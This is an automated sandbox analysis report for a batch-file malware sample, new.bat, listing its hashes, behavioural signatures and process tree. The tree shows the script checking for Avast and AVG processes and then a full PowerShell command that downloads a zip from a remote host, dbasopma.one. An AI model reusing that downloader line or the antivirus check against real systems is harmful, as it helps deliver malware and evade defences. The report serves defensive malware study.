Analysis

max time kernel: 119s
max time network: 120s
platform: windows7_x64
resource: win7-20240729-en
resource tags: arch:x64, arch:x86, image:win7-20240729-en, locale:en-us, os:windows7-x64, system
submitted: 16-12-2024 17:23

Static task: static1
Behavioral task: behavioral1
Sample: new.bat
Resource: win7-20240729-en (windows7-x64)
5 signatures
150 seconds
General

Target: new.bat
Size: 4KB
MD5: b79e56969d36c4b969bbe1623142e74a
SHA1: a7bcc5273b86e75dad66fed8fab1ec546ffa3bfd
SHA256: 6eb141225c4e4bfe3c347cac44b939ef697616b32e7d3646d6944210d99d0960
SHA512: fb9df37d81d5a9e8fa4500db392df29c4e7e8017cb9705277da7e1a2f0eb3b9df529c657174488998ba5cb82fb51149d31e666190c6de7e86773ac8e7711a356
SSDEEP: 96:EDONgDQ901HqmgGM5olT539rHZdrMkSKHUEeW05qy:EDpDe01HqGO5j
Malware Config

Signatures

Command and Scripting Interpreter: PowerShell
  pid 2420  powershell.exe

Enumerates processes with tasklist (1 TTPs, 2 IoCs)
  pid 2164  tasklist.exe
  pid 2700  tasklist.exe

Suspicious behavior: EnumeratesProcesses (1 IoCs)
  pid 2420  powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Token: SeDebugPrivilege  pid 2164  tasklist.exe
  Token: SeDebugPrivilege  pid 2700  tasklist.exe
  Token: SeDebugPrivilege  pid 2420  powershell.exe

Suspicious use of WriteProcessMemory (15 IoCs)
  PID 2848 (cmd.exe) wrote to memory of 2164, procid_target 32 (reported 3 times)
  PID 2848 (cmd.exe) wrote to memory of 2656, procid_target 33 (reported 3 times)
  PID 2848 (cmd.exe) wrote to memory of 2700, procid_target 35 (reported 3 times)
  PID 2848 (cmd.exe) wrote to memory of 2692, procid_target 36 (reported 3 times)
  PID 2848 (cmd.exe) wrote to memory of 2420, procid_target 37 (reported 3 times)
Processes

C:\Windows\system32\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\new.bat"
  PID: 2848
  - Suspicious use of WriteProcessMemory

  C:\Windows\system32\tasklist.exe
    tasklist /FI "IMAGENAME eq AvastUI.exe"
    PID: 2164
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\find.exe
    find /i "AvastUI.exe"
    PID: 2656

  C:\Windows\system32\tasklist.exe
    tasklist /FI "IMAGENAME eq avgui.exe"
    PID: 2700
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\find.exe
    find /i "avgui.exe"
    PID: 2692

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://dbasopma.one:6049/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"
    PID: 2420
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken